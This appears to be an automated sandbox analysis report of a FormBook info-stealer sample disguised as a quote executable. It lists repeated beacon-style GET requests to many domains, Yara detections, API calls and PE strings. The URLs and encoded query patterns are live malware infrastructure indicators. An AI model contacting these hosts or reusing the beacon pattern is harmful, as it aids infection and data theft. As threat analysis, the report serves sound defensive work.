          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.ribbonredwhiteandblue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1Host: www.merckcbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1Host: www.nl22584.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vasquez.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZT HTTP/1.1Host: www.0343888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.formabench.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.recurrentcornealerosion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vivabematividadesfisicas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.deepimper-325.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.ribbonredwhiteandblue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1Host: www.merckcbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1Host: www.nl22584.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vasquez.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.49.23.144 198.49.23.144
          Source: Joe Sandbox ViewIP Address: 198.49.23.144 198.49.23.144
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.formabench.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.recurrentcornealerosion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vivabematividadesfisicas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.deepimper-325.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.ribbonredwhiteandblue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1Host: www.merckcbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1Host: www.nl22584.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vasquez.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=M4RvuutZ2POk+PSHApDAqvJZeP9XKXVIMFKqdR66Gq6TstdOGJ+LE28ruv11hlz0BbZT HTTP/1.1Host: www.0343888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.formabench.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.recurrentcornealerosion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vivabematividadesfisicas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.deepimper-325.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=g0K5ifwFWV09n7i1NEiFZbu/6tutLBAV6sI0nEyaQ7OZPYqcNrOHgfWcWl8srePs8/mI&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.ribbonredwhiteandblue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=gwg9Jqv6MvMQvSpk15d+b4gnzBpdKN64CFpSPxal95mmJaU4NnZDhIpu8DM9TE7myrtY HTTP/1.1Host: www.merckcbd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?U4kp=NtxLpLUP-vTH68s&TZkpkdJ=0oFOxkVJsX06l7Ol9X6AmLZqAaNZWQ2XjAttG/9CS/jIsyrA37kUn+ErxcpPHIAnpq8x HTTP/1.1Host: www.nl22584.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=cnY7xDevrfqWnvOquF7kiqklKJL/wdDM1MHBb5XJK+cnY7Wyj/zDn1i5dZ9sTrZ3na4b&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vasquez.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.qianglongzhipin.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 02:18:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://box2136.temp.domains/~recurre4/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 30 0d 0a 09 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 72 65 63 75 72 72 65 6e 74 63 6f 72 6e 65 61 6c 65 72 6f 73 69 6f 6e 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 62 6f 78 32 31 33 36 2e 74 65 6d 70 2e 64 6f 6d 61 69 6e 73 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 69 30 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 69 31 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 69 32 2e 77 70 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 72 65 63 75 72 72 65 6e 74 63 6f 72 6e 65 61 6c 65 72 6f 73 69 6f 6e 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 6f 78 32 31 33 36 2e 74 65 6d 70 2e 64 6f 6d 61 69 6e 73 2f 7e 72 65 63 75 72 72 65 34 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: quote20210126.exe.exe, 00000000.00000002.662953284.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet1.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet1.xsdUhttp://tempuri.org/RealProjectDataSet2.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet2.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet3.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet4.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet4.xsdUhttp://tempuri.org/RealProjectDataSet5.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet5.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet6.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet6.xsdUhttp://tempuri.org/RealProjectDataSet7.xsd
          Source: quote20210126.exe.exeString found in binary or memory: http://tempuri.org/RealProjectDataSet7.xsd
          Source: explorer.exe, 00000009.00000002.2095501897.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000009.00000000.688104413.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041A050 NtClose,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00419F20 NtCreateFile,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00419FD0 NtReadFile,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041A04F NtClose,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041A0FB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00419F1B NtCreateFile,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00419FCD NtReadFile,
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_014294A8
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_0142DB4C
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_0142C148
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_0142E214
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_0142A758
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_061D6338
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_061DCB2D
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_061D632B
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_061D0006
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_061D0040
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 0_2_061D106F
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041D15A
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00402D87
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041DE7E
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00409E2C
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00409E30
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_0041DF67
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 6_2_00402FB0
          Source: quote20210126.exe.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: nVnzZjnYhVWWZd.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: quote20210126.exe.exe, 00000000.00000002.666244925.0000000006760000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000000.00000002.666604019.0000000006850000.00000002.00000001.sdmpBinary or memory string: originalfilename vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000000.00000002.666604019.0000000006850000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000000.00000002.661896304.0000000000BB8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000000.00000002.663025131.0000000002F68000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000000.00000002.665966908.0000000006090000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000003.00000002.657721102.00000000000F8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000004.00000000.658569476.0000000000488000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000005.00000002.660030041.00000000003D8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
          Source: quote20210126.exe.exe, 00000006.00000002.701554067.0000000000978000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBase64FormattingOptions.exe> vs quote20210126.exe.exe
